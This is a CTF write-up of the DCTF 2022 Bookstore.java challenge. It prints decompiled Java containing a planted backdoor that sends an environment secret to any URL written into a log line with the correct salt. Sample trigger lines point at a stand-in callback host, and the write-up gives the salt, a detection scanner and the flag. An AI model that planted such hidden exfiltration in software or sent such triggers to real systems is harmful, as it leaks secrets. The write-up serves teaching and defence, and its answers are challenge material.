April 18, 2022 11:04 pm GMT

Bookstore.java - DCTF 22

I took part in DCTF 2022 with the team Ulisse of the University of Bologna.

The Bookstore.java challenge stated that:

Web developer left the company because he was not being paid. He left some hidden features for him, to bypass security. Can you find the vulnerability? http://book-store.dragonsec.si

It also gave us a book_store.jar file.

The Log4Book

If we open the jar file with a decompiler (such as JD-GUI) we can see that there is a vulnerability in the log analyzer:

```java
// Decompiled log-analysis routine from book_store.jar: the template is
// get{...}salt=<SALT>, with SALT read from the environment.
Pattern pattern2 = Pattern.compile("get\\{.*\\}salt=" + System.getenv("SALT"));
Matcher matcher2 = pattern2.matcher(mssg);
String substring2 = null;
if (matcher2.find()) {
    substring2 = matcher2.group();
}
if (substring2 != null) {
    // 123 and 125 are the ASCII codes of '{' and '}': the text between them is passed on
    downloadFile(substring2.substring(substring2.indexOf(123) + 1, substring2.indexOf(125)));
}
```

If the log string contains the template get{...}salt= followed by the value of the SALT environment variable, the program sends an HTTP GET request to the URL between the braces, with a Not-Found header whose value is the NOT_FOUND environment variable:

```java
// downloadFile(url): a GET request to the URL taken from the log message,
// carrying the NOT_FOUND environment variable as the value of the not-found header
URL link = new URL(url);
link.toURI();
HttpURLConnection conn = (HttpURLConnection) link.openConnection();
conn.setRequestMethod("GET");
conn.setRequestProperty("not-found", System.getenv("NOT_FOUND"));
```
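To make the decompiled logic concrete, here is an added Python re-implementation of the same check (this is my example, not code from the challenge jar), together with a small log scanner a defender could run over an application log to spot lines that carry the hidden template, whether or not the salt in them is correct. The SALT value and the log lines are constructed for the demo; the real program reads SALT from the environment.

```python
import re
from typing import List, Optional, Tuple

# Constructed stand-in for the SALT environment variable used by the jar.
SALT = "oeeeeooo"

# Constructed log lines: a benign request, a line with the correct salt,
# and a guessing attempt with a wrong salt.
SAMPLE_LOG: List[str] = [
    "GET /book?page=3 200",
    "GET /book?q=get{http://callback.example.invalid/cb}salt=oeeeeooo 404",
    "GET /book?q=get{http://callback.example.invalid/cb}salt=aaaaaaaa 404",
]


def extract_target_url(log_line: str, salt: str = SALT) -> Optional[str]:
    """Mirror of the decompiled check: return the URL between the braces
    when the line matches get{...}salt=<salt>, otherwise None.

    The Java code concatenates SALT into the regex unescaped; re.escape is
    used here so the salt is always treated literally.
    """
    pattern = re.compile(r"get\{.*\}salt=" + re.escape(salt))
    m = pattern.search(log_line)
    if not m:
        return None
    hit = m.group(0)
    # indexOf(123) / indexOf(125) in the Java code: first '{' and first '}'
    return hit[hit.index("{") + 1 : hit.index("}")]


# Detection side: match the template shape only, independent of the salt,
# so failed guessing attempts are flagged as well as successful triggers.
TEMPLATE = re.compile(r"get\{[^}]*\}salt=")


def scan_logs(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, line) for every line carrying the template."""
    return [(i, line) for i, line in enumerate(lines, 1) if TEMPLATE.search(line)]


if __name__ == "__main__":
    for n, line in scan_logs(SAMPLE_LOG):
        print(n, extract_target_url(line), line)
```

Only the second sample line yields a URL from extract_target_url, but scan_logs reports both the second and third, which is the behaviour you want from a detection rule: an attacker probing for the salt leaves the template in the log long before the salt is right.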

Finding the salt

We're given a hint:

The method by which the salt is generated is given through variable names in one Java class. The salt is 8 chars long.

If we look at the class Art we can see that there are two strange variable names:

```java
String frequency = fontType.getValue();
int analysis_should_be_fun = findImageWidth(textHeight, artText, frequency);
```

which, read together, spell out: frequency analysis should be fun

Analyzing the frequency

After searching without success for studies on the letter frequency of Shakespeare's plays, we remembered that the hint said the salt is 8 characters long, and that there are exactly 8 paragraphs both on the page served by the website and in the file book.json.

If we join the most frequent letter of each paragraph we get the salt, and with it we can make the program send its request to a URL we control, carrying the flag in the Not-Found header.
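As an added example (not part of the original writeup), the frequency analysis step in Python: count letters per paragraph and take the most common one. The eight paragraphs below are constructed stand-ins for the ones in book.json, whose text is not reproduced here; each was written so that one letter clearly wins, producing the same salt the writeup found. The tie-breaking rule (alphabetical) is my own choice, since the challenge text gives none.

```python
from collections import Counter
from typing import Dict, List

# Constructed paragraphs standing in for the eight in book.json.
PARAGRAPHS: List[str] = [
    "Good morning, Oberon.",
    "Eleven geese were seen.",
    "The sweetest verse ever.",
    "Seven sentences end here.",
    "Keep the fleece green.",
    "Too soon to go home, Otto.",
    "Oboe solos on Monday.",
    "Orion rose over Oslo.",
]


def letter_frequencies(text: str) -> Dict[str, float]:
    """Relative frequency of each letter, case-folded, ignoring non-letters."""
    counts = Counter(ch for ch in text.lower() if ch.isalpha())
    total = sum(counts.values())
    return {letter: n / total for letter, n in counts.items()}


def most_frequent_letter(text: str) -> str:
    """Most common letter in the text; ties are broken alphabetically so the
    result is deterministic (Counter.most_common would depend on insertion order)."""
    counts = Counter(ch for ch in text.lower() if ch.isalpha())
    if not counts:
        raise ValueError("paragraph contains no letters")
    return min(counts.items(), key=lambda kv: (-kv[1], kv[0]))[0]


def derive_salt(paragraphs: List[str], length: int = 8) -> str:
    """Join the most frequent letter of each paragraph into the salt.

    The hint fixes the salt at 8 characters, so a paragraph count that
    disagrees is reported instead of silently producing a wrong salt.
    """
    if len(paragraphs) != length:
        raise ValueError(f"expected {length} paragraphs, got {len(paragraphs)}")
    return "".join(most_frequent_letter(p) for p in paragraphs)


if __name__ == "__main__":
    for p in PARAGRAPHS:
        top = most_frequent_letter(p)
        print(f"{top}  {letter_frequencies(p)[top]:.2f}  {p}")
    print("salt:", derive_salt(PARAGRAPHS))
```

On real text the winner is usually 'e' or another vowel, which is why a salt built this way has so little entropy: a guesser who knows the construction rule only has to try a handful of letters per position, which is the weakness the challenge exploits.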

Salt: oeeeeooo

Flag: dctf{L0g_4_hid3n_d@7@_n0t_s0_h@rd_righ7}


Original Link: https://dev.to/vaiton/bookstorejava-dctf-2022-5em9
